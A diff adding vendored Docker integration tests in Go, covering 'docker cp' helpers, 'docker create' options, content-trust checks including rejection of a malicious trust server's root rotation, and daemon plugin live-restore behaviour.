+	{ftRegular, "dir4/file3-2", "file4-2"},
+	{ftDir, "dir5", ""},
+	{ftSymlink, "symlinkToFile1", "file1"},
+	{ftSymlink, "symlinkToDir1", "dir1"},
+	{ftSymlink, "brokenSymlinkToFileX", "fileX"},
+	{ftSymlink, "brokenSymlinkToDirX", "dirX"},
+	{ftSymlink, "symlinkToAbsDir", "/root"},
+}
+
+func defaultMkContentCommand() string {
+	return mkFilesCommand(defaultFileData)
+}
+
+func makeTestContentInDir(c *check.C, dir string) {
+	for _, fd := range defaultFileData {
+		path := filepath.Join(dir, filepath.FromSlash(fd.path))
+		switch fd.filetype {
+		case ftRegular:
+			c.Assert(ioutil.WriteFile(path, []byte(fd.contents+"\n"), os.FileMode(0666)), checker.IsNil)
+		case ftDir:
+			c.Assert(os.Mkdir(path, os.FileMode(0777)), checker.IsNil)
+		case ftSymlink:
+			c.Assert(os.Symlink(fd.contents, path), checker.IsNil)
+		}
+	}
+}
+
+type testContainerOptions struct {
+	addContent bool
+	readOnly   bool
+	volumes    []string
+	workDir    string
+	command    string
+}
+
+func makeTestContainer(c *check.C, options testContainerOptions) (containerID string) {
+	if options.addContent {
+		mkContentCmd := defaultMkContentCommand()
+		if options.command == "" {
+			options.command = mkContentCmd
+		} else {
+			options.command = fmt.Sprintf("%s && %s", defaultMkContentCommand(), options.command)
+		}
+	}
+
+	if options.command == "" {
+		options.command = "#(nop)"
+	}
+
+	args := []string{"run", "-d"}
+
+	for _, volume := range options.volumes {
+		args = append(args, "-v", volume)
+	}
+
+	if options.workDir != "" {
+		args = append(args, "-w", options.workDir)
+	}
+
+	if options.readOnly {
+		args = append(args, "--read-only")
+	}
+
+	args = append(args, "busybox", "/bin/sh", "-c", options.command)
+
+	out, _ := dockerCmd(c, args...)
+
+	containerID = strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+
+	exitCode := strings.TrimSpace(out)
+	if exitCode != "0" {
+		out, _ = dockerCmd(c, "logs", containerID)
+	}
+	c.Assert(exitCode, checker.Equals, "0", check.Commentf("failed to make test container: %s", out))
+
+	return
+}
+
+func makeCatFileCommand(path string) string {
+	return fmt.Sprintf("if [ -f %s ]; then cat %s; fi", path, path)
+}
+
+func cpPath(pathElements ...string) string {
+	localizedPathElements := make([]string, len(pathElements))
+	for i, path := range pathElements {
+		localizedPathElements[i] = filepath.FromSlash(path)
+	}
+	return strings.Join(localizedPathElements, string(filepath.Separator))
+}
+
+func cpPathTrailingSep(pathElements ...string) string {
+	return fmt.Sprintf("%s%c", cpPath(pathElements...), filepath.Separator)
+}
+
+func containerCpPath(containerID string, pathElements ...string) string {
+	joined := strings.Join(pathElements, "/")
+	return fmt.Sprintf("%s:%s", containerID, joined)
+}
+
+func containerCpPathTrailingSep(containerID string, pathElements ...string) string {
+	return fmt.Sprintf("%s/", containerCpPath(containerID, pathElements...))
+}
+
+func runDockerCp(c *check.C, src, dst string) (err error) {
+	c.Logf("running `docker cp %s %s`", src, dst)
+
+	args := []string{"cp", src, dst}
+
+	out, _, err := runCommandWithOutput(exec.Command(dockerBinary, args...))
+	if err != nil {
+		err = fmt.Errorf("error executing `docker cp` command: %s: %s", err, out)
+	}
+
+	return
+}
+
+func startContainerGetOutput(c *check.C, containerID string) (out string, err error) {
+	c.Logf("running `docker start -a %s`", containerID)
+
+	args := []string{"start", "-a", containerID}
+
+	out, _, err = runCommandWithOutput(exec.Command(dockerBinary, args...))
+	if err != nil {
+		err = fmt.Errorf("error executing `docker start` command: %s: %s", err, out)
+	}
+
+	return
+}
+
+func getTestDir(c *check.C, label string) (tmpDir string) {
+	var err error
+
+	tmpDir, err = ioutil.TempDir("", label)
+	// unable to make temporary directory
+	c.Assert(err, checker.IsNil)
+
+	return
+}
+
+func isCpNotExist(err error) bool {
+	return strings.Contains(err.Error(), "no such file or directory") || strings.Contains(err.Error(), "cannot find the file specified")
+}
+
+func isCpDirNotExist(err error) bool {
+	return strings.Contains(err.Error(), archive.ErrDirNotExists.Error())
+}
+
+func isCpNotDir(err error) bool {
+	return strings.Contains(err.Error(), archive.ErrNotDirectory.Error()) || strings.Contains(err.Error(), "filename, directory name, or volume label syntax is incorrect")
+}
+
+func isCpCannotCopyDir(err error) bool {
+	return strings.Contains(err.Error(), archive.ErrCannotCopyDir.Error())
+}
+
+func isCpCannotCopyReadOnly(err error) bool {
+	return strings.Contains(err.Error(), "marked read-only")
+}
+
+func isCannotOverwriteNonDirWithDir(err error) bool {
+	return strings.Contains(err.Error(), "cannot overwrite non-directory")
+}
+
+func fileContentEquals(c *check.C, filename, contents string) (err error) {
+	c.Logf("checking that file %q contains %q\n", filename, contents)
+
+	fileBytes, err := ioutil.ReadFile(filename)
+	if err != nil {
+		return
+	}
+
+	expectedBytes, err := ioutil.ReadAll(strings.NewReader(contents))
+	if err != nil {
+		return
+	}
+
+	if !bytes.Equal(fileBytes, expectedBytes) {
+		err = fmt.Errorf("file content not equal - expected %q, got %q", string(expectedBytes), string(fileBytes))
+	}
+
+	return
+}
+
+func symlinkTargetEquals(c *check.C, symlink, expectedTarget string) (err error) {
+	c.Logf("checking that the symlink %q points to %q\n", symlink, expectedTarget)
+
+	actualTarget, err := os.Readlink(symlink)
+	if err != nil {
+		return
+	}
+
+	if actualTarget != expectedTarget {
+		err = fmt.Errorf("symlink target points to %q not %q", actualTarget, expectedTarget)
+	}
+
+	return
+}
+
+func containerStartOutputEquals(c *check.C, containerID, contents string) (err error) {
+	c.Logf("checking that container %q start output contains %q\n", containerID, contents)
+
+	out, err := startContainerGetOutput(c, containerID)
+	if err != nil {
+		return
+	}
+
+	if out != contents {
+		err = fmt.Errorf("output contents not equal - expected %q, got %q", contents, out)
+	}
+
+	return
+}
+
+func defaultVolumes(tmpDir string) []string {
+	if SameHostDaemon.Condition() {
+		return []string{
+			"/vol1",
+			fmt.Sprintf("%s:/vol2", tmpDir),
+			fmt.Sprintf("%s:/vol3", filepath.Join(tmpDir, "vol3")),
+			fmt.Sprintf("%s:/vol_ro:ro", filepath.Join(tmpDir, "vol_ro")),
+		}
+	}
+
+	// Can't bind-mount volumes with separate host daemon.
+	return []string{"/vol1", "/vol2", "/vol3", "/vol_ro:/vol_ro:ro"}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go
new file mode 100644
index 0000000000..515a340976
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go
@@ -0,0 +1,513 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"reflect"
+	"strings"
+	"time"
+
+	"os/exec"
+
+	"io/ioutil"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/go-connections/nat"
+	"github.com/go-check/check"
+)
+
+// Make sure we can create a simple container with some args
+func (s *DockerSuite) TestCreateArgs(c *check.C) {
+	// Intentionally clear entrypoint, as the Windows busybox image needs an entrypoint, which breaks this test
+	out, _ := dockerCmd(c, "create", "--entrypoint=", "busybox", "command", "arg1", "arg2", "arg with space", "-c", "flags")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "inspect", cleanedContainerID)
+
+	containers := []struct {
+		ID      string
+		Created time.Time
+		Path    string
+		Args    []string
+		Image   string
+	}{}
+
+	err := json.Unmarshal([]byte(out), &containers)
+	c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err))
+	c.Assert(containers, checker.HasLen, 1)
+
+	cont := containers[0]
+	c.Assert(string(cont.Path), checker.Equals, "command", check.Commentf("Unexpected container path. Expected command, received: %s", cont.Path))
+
+	b := false
+	expected := []string{"arg1", "arg2", "arg with space", "-c", "flags"}
+	for i, arg := range expected {
+		if arg != cont.Args[i] {
+			b = true
+			break
+		}
+	}
+	if len(cont.Args) != len(expected) || b {
+		c.Fatalf("Unexpected args. Expected %v, received: %v", expected, cont.Args)
+	}
+
+}
+
+// Make sure we can grow the container's rootfs at creation time.
+func (s *DockerSuite) TestCreateGrowRootfs(c *check.C) {
+	// Windows and Devicemapper support growing the rootfs
+	if daemonPlatform != "windows" {
+		testRequires(c, Devicemapper)
+	}
+	out, _ := dockerCmd(c, "create", "--storage-opt", "size=120G", "busybox")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	inspectOut := inspectField(c, cleanedContainerID, "HostConfig.StorageOpt")
+	c.Assert(inspectOut, checker.Equals, "map[size:120G]")
+}
+
+// Make sure we cannot shrink the container's rootfs at creation time.
+func (s *DockerSuite) TestCreateShrinkRootfs(c *check.C) {
+	testRequires(c, Devicemapper)
+
+	// Ensure this fails because of the defaultBaseFsSize is 10G
+	out, _, err := dockerCmdWithError("create", "--storage-opt", "size=5G", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Container size cannot be smaller than")
+}
+
+// Make sure we can set hostconfig options too
+func (s *DockerSuite) TestCreateHostConfig(c *check.C) {
+	out, _ := dockerCmd(c, "create", "-P", "busybox", "echo")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "inspect", cleanedContainerID)
+
+	containers := []struct {
+		HostConfig *struct {
+			PublishAllPorts bool
+		}
+	}{}
+
+	err := json.Unmarshal([]byte(out), &containers)
+	c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err))
+	c.Assert(containers, checker.HasLen, 1)
+
+	cont := containers[0]
+	c.Assert(cont.HostConfig, check.NotNil, check.Commentf("Expected HostConfig, got none"))
+	c.Assert(cont.HostConfig.PublishAllPorts, check.NotNil, check.Commentf("Expected PublishAllPorts, got false"))
+}
+
+func (s *DockerSuite) TestCreateWithPortRange(c *check.C) {
+	out, _ := dockerCmd(c, "create", "-p", "3300-3303:3300-3303/tcp", "busybox", "echo")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "inspect", cleanedContainerID)
+
+	containers := []struct {
+		HostConfig *struct {
+			PortBindings map[nat.Port][]nat.PortBinding
+		}
+	}{}
+	err := json.Unmarshal([]byte(out), &containers)
+	c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err))
+	c.Assert(containers, checker.HasLen, 1)
+
+	cont := containers[0]
+
+	c.Assert(cont.HostConfig, check.NotNil, check.Commentf("Expected HostConfig, got none"))
+	c.Assert(cont.HostConfig.PortBindings, checker.HasLen, 4, check.Commentf("Expected 4 ports bindings, got %d", len(cont.HostConfig.PortBindings)))
+
+	for k, v := range cont.HostConfig.PortBindings {
+		c.Assert(v, checker.HasLen, 1, check.Commentf("Expected 1 ports binding, for the port  %s but found %s", k, v))
+		c.Assert(k.Port(), checker.Equals, v[0].HostPort, check.Commentf("Expected host port %s to match published port %s", k.Port(), v[0].HostPort))
+
+	}
+
+}
+
+func (s *DockerSuite) TestCreateWithLargePortRange(c *check.C) {
+	out, _ := dockerCmd(c, "create", "-p", "1-65535:1-65535/tcp", "busybox", "echo")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "inspect", cleanedContainerID)
+
+	containers := []struct {
+		HostConfig *struct {
+			PortBindings map[nat.Port][]nat.PortBinding
+		}
+	}{}
+
+	err := json.Unmarshal([]byte(out), &containers)
+	c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err))
+	c.Assert(containers, checker.HasLen, 1)
+
+	cont := containers[0]
+	c.Assert(cont.HostConfig, check.NotNil, check.Commentf("Expected HostConfig, got none"))
+	c.Assert(cont.HostConfig.PortBindings, checker.HasLen, 65535)
+
+	for k, v := range cont.HostConfig.PortBindings {
+		c.Assert(v, checker.HasLen, 1)
+		c.Assert(k.Port(), checker.Equals, v[0].HostPort, check.Commentf("Expected host port %s to match published port %s", k.Port(), v[0].HostPort))
+	}
+
+}
+
+// "test123" should be printed by docker create + start
+func (s *DockerSuite) TestCreateEchoStdout(c *check.C) {
+	out, _ := dockerCmd(c, "create", "busybox", "echo", "test123")
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "start", "-ai", cleanedContainerID)
+	c.Assert(out, checker.Equals, "test123\n", check.Commentf("container should've printed 'test123', got %q", out))
+
+}
+
+func (s *DockerSuite) TestCreateVolumesCreated(c *check.C) {
+	testRequires(c, SameHostDaemon)
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+
+	name := "test_create_volume"
+	dockerCmd(c, "create", "--name", name, "-v", prefix+slash+"foo", "busybox")
+
+	dir, err := inspectMountSourceField(name, prefix+slash+"foo")
+	c.Assert(err, check.IsNil, check.Commentf("Error getting volume host path: %q", err))
+
+	if _, err := os.Stat(dir); err != nil && os.IsNotExist(err) {
+		c.Fatalf("Volume was not created")
+	}
+	if err != nil {
+		c.Fatalf("Error statting volume host path: %q", err)
+	}
+
+}
+
+func (s *DockerSuite) TestCreateLabels(c *check.C) {
+	name := "test_create_labels"
+	expected := map[string]string{"k1": "v1", "k2": "v2"}
+	dockerCmd(c, "create", "--name", name, "-l", "k1=v1", "--label", "k2=v2", "busybox")
+
+	actual := make(map[string]string)
+	inspectFieldAndMarshall(c, name, "Config.Labels", &actual)
+
+	if !reflect.DeepEqual(expected, actual) {
+		c.Fatalf("Expected %s got %s", expected, actual)
+	}
+}
+
+func (s *DockerSuite) TestCreateLabelFromImage(c *check.C) {
+	imageName := "testcreatebuildlabel"
+	_, err := buildImage(imageName,
+		`FROM busybox
+		LABEL k1=v1 k2=v2`,
+		true)
+
+	c.Assert(err, check.IsNil)
+
+	name := "test_create_labels_from_image"
+	expected := map[string]string{"k2": "x", "k3": "v3", "k1": "v1"}
+	dockerCmd(c, "create", "--name", name, "-l", "k2=x", "--label", "k3=v3", imageName)
+
+	actual := make(map[string]string)
+	inspectFieldAndMarshall(c, name, "Config.Labels", &actual)
+
+	if !reflect.DeepEqual(expected, actual) {
+		c.Fatalf("Expected %s got %s", expected, actual)
+	}
+}
+
+func (s *DockerSuite) TestCreateHostnameWithNumber(c *check.C) {
+	image := "busybox"
+	// Busybox on Windows does not implement hostname command
+	if daemonPlatform == "windows" {
+		image = WindowsBaseImage
+	}
+	out, _ := dockerCmd(c, "run", "-h", "web.0", image, "hostname")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "web.0", check.Commentf("hostname not set, expected `web.0`, got: %s", out))
+
+}
+
+func (s *DockerSuite) TestCreateRM(c *check.C) {
+	// Test to make sure we can 'rm' a new container that is in
+	// "Created" state, and has ever been run. Test "rm -f" too.
+
+	// create a container
+	out, _ := dockerCmd(c, "create", "busybox")
+	cID := strings.TrimSpace(out)
+
+	dockerCmd(c, "rm", cID)
+
+	// Now do it again so we can "rm -f" this time
+	out, _ = dockerCmd(c, "create", "busybox")
+
+	cID = strings.TrimSpace(out)
+	dockerCmd(c, "rm", "-f", cID)
+}
+
+func (s *DockerSuite) TestCreateModeIpcContainer(c *check.C) {
+	// Uses Linux specific functionality (--ipc)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+
+	out, _ := dockerCmd(c, "create", "busybox")
+	id := strings.TrimSpace(out)
+
+	dockerCmd(c, "create", fmt.Sprintf("--ipc=container:%s", id), "busybox")
+}
+
+func (s *DockerSuite) TestCreateByImageID(c *check.C) {
+	imageName := "testcreatebyimageid"
+	imageID, err := buildImage(imageName,
+		`FROM busybox
+		MAINTAINER dockerio`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	truncatedImageID := stringid.TruncateID(imageID)
+
+	dockerCmd(c, "create", imageID)
+	dockerCmd(c, "create", truncatedImageID)
+	dockerCmd(c, "create", fmt.Sprintf("%s:%s", imageName, truncatedImageID))
+
+	// Ensure this fails
+	out, exit, _ := dockerCmdWithError("create", fmt.Sprintf("%s:%s", imageName, imageID))
+	if exit == 0 {
+		c.Fatalf("expected non-zero exit code; received %d", exit)
+	}
+
+	if expected := "Error parsing reference"; !strings.Contains(out, expected) {
+		c.Fatalf(`Expected %q in output; got: %s`, expected, out)
+	}
+
+	out, exit, _ = dockerCmdWithError("create", fmt.Sprintf("%s:%s", "wrongimage", truncatedImageID))
+	if exit == 0 {
+		c.Fatalf("expected non-zero exit code; received %d", exit)
+	}
+
+	if expected := "Unable to find image"; !strings.Contains(out, expected) {
+		c.Fatalf(`Expected %q in output; got: %s`, expected, out)
+	}
+}
+
+func (s *DockerTrustSuite) TestTrustedCreate(c *check.C) {
+	repoName := s.setupTrustedImage(c, "trusted-create")
+
+	// Try create
+	createCmd := exec.Command(dockerBinary, "create", repoName)
+	s.trustedCmd(createCmd)
+	out, _, err := runCommandWithOutput(createCmd)
+	c.Assert(err, check.IsNil)
+	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out))
+
+	dockerCmd(c, "rmi", repoName)
+
+	// Try untrusted create to ensure we pushed the tag to the registry
+	createCmd = exec.Command(dockerBinary, "create", "--disable-content-trust=true", repoName)
+	s.trustedCmd(createCmd)
+	out, _, err = runCommandWithOutput(createCmd)
+	c.Assert(err, check.IsNil)
+	c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create with --disable-content-trust:\n%s", out))
+
+}
+
+func (s *DockerTrustSuite) TestUntrustedCreate(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercliuntrusted/createtest", privateRegistryURL)
+	withTagName := fmt.Sprintf("%s:latest", repoName)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", withTagName)
+	dockerCmd(c, "push", withTagName)
+	dockerCmd(c, "rmi", withTagName)
+
+	// Try trusted create on untrusted tag
+	createCmd := exec.Command(dockerBinary, "create", withTagName)
+	s.trustedCmd(createCmd)
+	out, _, err := runCommandWithOutput(createCmd)
+	c.Assert(err, check.Not(check.IsNil))
+	c.Assert(string(out), checker.Contains, fmt.Sprintf("does not have trust data for %s", repoName), check.Commentf("Missing expected output on trusted create:\n%s", out))
+
+}
+
+func (s *DockerTrustSuite) TestTrustedIsolatedCreate(c *check.C) {
+	repoName := s.setupTrustedImage(c, "trusted-isolated-create")
+
+	// Try create
+	createCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated-create", "create", repoName)
+	s.trustedCmd(createCmd)
+	out, _, err := runCommandWithOutput(createCmd)
+	c.Assert(err, check.IsNil)
+	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out))
+
+	dockerCmd(c, "rmi", repoName)
+}
+
+func (s *DockerTrustSuite) TestCreateWhenCertExpired(c *check.C) {
+	c.Skip("Currently changes system time, causing instability")
+	repoName := s.setupTrustedImage(c, "trusted-create-expired")
+
+	// Certificates have 10 years of expiration
+	elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11)
+
+	runAtDifferentDate(elevenYearsFromNow, func() {
+		// Try create
+		createCmd := exec.Command(dockerBinary, "create", repoName)
+		s.trustedCmd(createCmd)
+		out, _, err := runCommandWithOutput(createCmd)
+		c.Assert(err, check.Not(check.IsNil))
+		c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out))
+	})
+
+	runAtDifferentDate(elevenYearsFromNow, func() {
+		// Try create
+		createCmd := exec.Command(dockerBinary, "create", "--disable-content-trust", repoName)
+		s.trustedCmd(createCmd)
+		out, _, err := runCommandWithOutput(createCmd)
+		c.Assert(err, check.Not(check.IsNil))
+		c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out))
+
+	})
+}
+
+func (s *DockerTrustSuite) TestTrustedCreateFromBadTrustServer(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockerclievilcreate/trusted:latest", privateRegistryURL)
+	evilLocalConfigDir, err := ioutil.TempDir("", "evilcreate-local-config-dir")
+	c.Assert(err, check.IsNil)
+
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil)
+	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out))
+
+	dockerCmd(c, "rmi", repoName)
+
+	// Try create
+	createCmd := exec.Command(dockerBinary, "create", repoName)
+	s.trustedCmd(createCmd)
+	out, _, err = runCommandWithOutput(createCmd)
+	c.Assert(err, check.IsNil)
+	c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out))
+
+	dockerCmd(c, "rmi", repoName)
+
+	// Kill the notary server, start a new "evil" one.
+	s.not.Close()
+	s.not, err = newTestNotary(c)
+	c.Assert(err, check.IsNil)
+
+	// In order to make an evil server, lets re-init a client (with a different trust dir) and push new data.
+	// tag an image and upload it to the private registry
+	dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName)
+
+	// Push up to the new server
+	pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err = runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil)
+	c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out))
+
+	// Now, try creating with the original client from this new trust server. This should fail because the new root is invalid.
+	createCmd = exec.Command(dockerBinary, "create", repoName)
+	s.trustedCmd(createCmd)
+	out, _, err = runCommandWithOutput(createCmd)
+	if err == nil {
+		c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out)
+	}
+	if !strings.Contains(out, "could not rotate trust to a new trusted root") {
+		c.Fatalf("Missing expected output on trusted create:\n%s", out)
+	}
+
+}
+
+func (s *DockerSuite) TestCreateStopSignal(c *check.C) {
+	name := "test_create_stop_signal"
+	dockerCmd(c, "create", "--name", name, "--stop-signal", "9", "busybox")
+
+	res := inspectFieldJSON(c, name, "Config.StopSignal")
+	c.Assert(res, checker.Contains, "9")
+
+}
+
+func (s *DockerSuite) TestCreateWithWorkdir(c *check.C) {
+	name := "foo"
+
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	dir := prefix + slash + "home" + slash + "foo" + slash + "bar"
+
+	dockerCmd(c, "create", "--name", name, "-w", dir, "busybox")
+	// Windows does not create the workdir until the container is started
+	if daemonPlatform == "windows" {
+		dockerCmd(c, "start", name)
+	}
+	dockerCmd(c, "cp", fmt.Sprintf("%s:%s", name, dir), prefix+slash+"tmp")
+}
+
+func (s *DockerSuite) TestCreateWithInvalidLogOpts(c *check.C) {
+	name := "test-invalidate-log-opts"
+	out, _, err := dockerCmdWithError("create", "--name", name, "--log-opt", "invalid=true", "busybox")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "unknown log opt")
+
+	out, _ = dockerCmd(c, "ps", "-a")
+	c.Assert(out, checker.Not(checker.Contains), name)
+}
+
+// #20972
+func (s *DockerSuite) TestCreate64ByteHexID(c *check.C) {
+	out := inspectField(c, "busybox", "Id")
+	imageID := strings.TrimPrefix(strings.TrimSpace(string(out)), "sha256:")
+
+	dockerCmd(c, "create", imageID)
+}
+
+// Test case for #23498
+func (s *DockerSuite) TestCreateUnsetEntrypoint(c *check.C) {
+	name := "test-entrypoint"
+	dockerfile := `FROM busybox
+ADD entrypoint.sh /entrypoint.sh
+RUN chmod 755 /entrypoint.sh
+ENTRYPOINT ["/entrypoint.sh"]
+CMD echo foobar`
+
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"entrypoint.sh": `#!/bin/sh
+echo "I am an entrypoint"
+exec "$@"`,
+	})
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+
+	_, err = buildImageFromContext(name, ctx, true)
+	c.Assert(err, check.IsNil)
+
+	out, _ := dockerCmd(c, "create", "--entrypoint=", name, "echo", "foo")
+	id := strings.TrimSpace(out)
+	c.Assert(id, check.Not(check.Equals), "")
+	out, _ = dockerCmd(c, "start", "-a", id)
+	c.Assert(strings.TrimSpace(out), check.Equals, "foo")
+}
+
+// #22471
+func (s *DockerSuite) TestCreateStopTimeout(c *check.C) {
+	name1 := "test_create_stop_timeout_1"
+	dockerCmd(c, "create", "--name", name1, "--stop-timeout", "15", "busybox")
+
+	res := inspectFieldJSON(c, name1, "Config.StopTimeout")
+	c.Assert(res, checker.Contains, "15")
+
+	name2 := "test_create_stop_timeout_2"
+	dockerCmd(c, "create", "--name", name2, "busybox")
+
+	res = inspectFieldJSON(c, name2, "Config.StopTimeout")
+	c.Assert(res, checker.Contains, "null")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go
new file mode 100644
index 0000000000..f91edc6555
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go
@@ -0,0 +1,317 @@
+// +build linux
+
+package main
+
+import (
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+	"syscall"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/go-check/check"
+)
+
+// TestDaemonRestartWithPluginEnabled tests state restore for an enabled plugin
+func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) {
+	testRequires(c, IsAmd64, Network)
+
+	if err := s.d.Start(); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+
+	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil {
+		c.Fatalf("Could not install plugin: %v %s", err, out)
+	}
+
+	defer func() {
+		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
+			c.Fatalf("Could not disable plugin: %v %s", err, out)
+		}
+		if out, err := s.d.Cmd("plugin", "remove", pName); err != nil {
+			c.Fatalf("Could not remove plugin: %v %s", err, out)
+		}
+	}()
+
+	if err := s.d.Restart(); err != nil {
+		c.Fatalf("Could not restart daemon: %v", err)
+	}
+
+	out, err := s.d.Cmd("plugin", "ls")
+	if err != nil {
+		c.Fatalf("Could not list plugins: %v %s", err, out)
+	}
+	c.Assert(out, checker.Contains, pName)
+	c.Assert(out, checker.Contains, "true")
+}
+
+// TestDaemonRestartWithPluginDisabled tests state restore for a disabled plugin
+func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) {
+	testRequires(c, IsAmd64, Network)
+
+	if err := s.d.Start(); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+
+	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName, "--disable"); err != nil {
+		c.Fatalf("Could not install plugin: %v %s", err, out)
+	}
+
+	defer func() {
+		if out, err := s.d.Cmd("plugin", "remove", pName); err != nil {
+			c.Fatalf("Could not remove plugin: %v %s", err, out)
+		}
+	}()
+
+	if err := s.d.Restart(); err != nil {
+		c.Fatalf("Could not restart daemon: %v", err)
+	}
+
+	out, err := s.d.Cmd("plugin", "ls")
+	if err != nil {
+		c.Fatalf("Could not list plugins: %v %s", err, out)
+	}
+	c.Assert(out, checker.Contains, pName)
+	c.Assert(out, checker.Contains, "false")
+}
+
+// TestDaemonKillLiveRestoreWithPlugins SIGKILLs daemon started with --live-restore.
+// Plugins should continue to run.
+func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) {
+	testRequires(c, IsAmd64, Network)
+
+	if err := s.d.Start("--live-restore"); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil {
+		c.Fatalf("Could not install plugin: %v %s", err, out)
+	}
+	defer func() {
+		if err := s.d.Restart("--live-restore"); err != nil {
+			c.Fatalf("Could not restart daemon: %v", err)
+		}
+		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
+			c.Fatalf("Could not disable plugin: %v %s", err, out)
+		}
+		if out, err := s.d.Cmd("plugin", "remove", pName); err != nil {
+			c.Fatalf("Could not remove plugin: %v %s", err, out)
+		}
+	}()
+
+	if err := s.d.Kill(); err != nil {
+		c.Fatalf("Could not kill daemon: %v", err)
+	}
+
+	cmd := exec.Command("pgrep", "-f", pluginProcessName)
+	if out, ec, err := runCommandWithOutput(cmd); ec != 0 {
+		c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out)
+	}
+}
+
+// TestDaemonShutdownLiveRestoreWithPlugins SIGTERMs daemon started with --live-restore.
+// Plugins should continue to run.
+func (s *DockerDaemonSuite) TestDaemonShutdownLiveRestoreWithPlugins(c *check.C) {
+	testRequires(c, IsAmd64, Network)
+
+	if err := s.d.Start("--live-restore"); err != nil {
+		c.Fatalf("Could not start daemon: %v", err)
+	}
+	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil {
+		c.Fatalf("Could not install plugin: %v %s", err, out)
+	}
+	defer func() {
+		if err := s.d.Restart("--live-restore"); err != nil {
+			c.Fatalf("Could not restart daemon: %v", err)
+		}
+		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
+			c.Fatalf("Could not disable plugin: %v %s", err, out)
+		}
+		if out, err := s.d.Cmd("plugin", "remove", pName); err != nil {
+			c.Fatalf("Could not remove plugin: %v %s", err, out)
+		}
+	}()
+
+	if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil {
+		c.Fatalf("Could not kill daemon: %v", err)
+	}
+
+	cmd := exec.Command("pgrep", "-f", pluginProcessName)
+	if out, ec, err := runCommandWithOutput(cmd); ec != 0 {
+		c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out)
+	}
+}
+
